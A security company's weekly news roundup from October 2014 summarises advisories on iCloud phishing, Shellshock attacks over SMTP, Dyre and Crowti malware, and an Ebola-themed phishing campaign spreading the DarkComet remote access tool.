Week in review 31 October 2014
In case you missed it, MailShark was listed in NetworkWorld new products of the week. We are item 14 in the slideshow.
In news that probably surprises no-one, SMTP is now being used for Shellshock attacks. Unsurprising also that cyber criminals are using the current Ebola crisis for their own malevolent purposes. The overall theme for the week though was advisories; US-CERT posted one on Dyre, Microsoft posted one on Crowti ransomware and Apple posted an advisory on iCloud phishing attempts.
Apple issues warnings on iCloud phishing
Apple has defended its iCoud service, after doubts were raised in the wake of some high profile hacks of celebrity iCloud accounts. It’s not just celebrity accounts; general users have been targeted via phishing campaigns. With this in mind, Apple took the step of issuing a warning on their website over phishing threats. The warning contains screenshots of what to expect when a site is bogus; basically, if a user tries to login to iCloud and they receive a warning about an invalid digital certificate, then they should not proceed any further. It appears that some users have been tricked by the phishing websites already; Apple has stated that some anomalous activity has been detected on individual user accounts.
SMTP being used for Shellshock attacks
It was probably inevitable that Shellshock would eventually use SMTP as a method of attack. This week saw the first such instances. The attack uses malicious code in the header file to download and install a script in the /tmp directory. The usual payload will be malware that provides a command and control capability for the attacker. Often the victim PC can then either build a botnet or can join an existing botnet. Once this occurs, the PC can be used to launch Distributed Denial of Service attacks. This latest method of attack devised for Shellshock serves as a timely reminder to ensure software is kept up to date, with the latest patches installed.
US-CERT issues warning over Dyre
Dyre has been floating around since at least mid September, though according to US-CERT, a current campaign to spread Dyre malware started in mid-October. The current campaign takes advantage of two old vulnerabilities in Adobe Reader. Both the vulnerabilities have patches; CVE-2013-2729 had a fix issued on 14 May 2013, whilst CVE-2010-0188 had a fix released on 16 February 2010. The spam email used for the attack contains an attachment called “Invoice621785.pdf”, or similar. When Dyre is installed, it masquerades as “Google Update Service. Dyre’s latest incarnation also includes the ability to send a list of installed software on a victim PC to an attacker.
Crowti ransomware spike
Microsoft posted a warning on TechNet about a spike in detection rate for the Crowti ransomware. Crowti can be spread via spam email. The email contains an attachment (usually a zip file) which when opened and run will install the malware. Microsoft has listed a number of attachment names used by the spam email to lure the user into opening the attachment. The names used include Invoice, VOICE, document, etc. If Crowti is successful, a ransom message is displayed informing the user that their files have been encrypted. Crowti points the user to a website where they can pay a ransom in Bitcoin. The message also informs the user to not bother looking for a solution “because they do not exist”. The recommendation from Microsoft is to not pay the ransom. Affected users may need to restore their files from a backup. Microsoft also recommends performing a full system scan.
Ebola phishing campaign delivers a RAT
It was inevitable that cyber criminals would start using the current Ebola crisis for their own ends; in this case, a phishing campaign. Spam emails with the subject line “Ebola Safety Tips-By WHO” contained a link to a site. If clicked, the site would download a RAR file to the user PC. The RAR file contained the Remote Administrative Tool (RAT) DarkComet. Whilst DarkComet is technically legitimate software, many of its capabilities have made it a favourite tool for attackers. One particular such capability is its stealth capability. Another is the ability to remotely operate the PC webcam and microphone. And of course, it can provide an attacker with the means to steal sensitive information, such as login credentials, etc. Small wonder then that DarkComet will often be flagged as malware by Anti Virus software.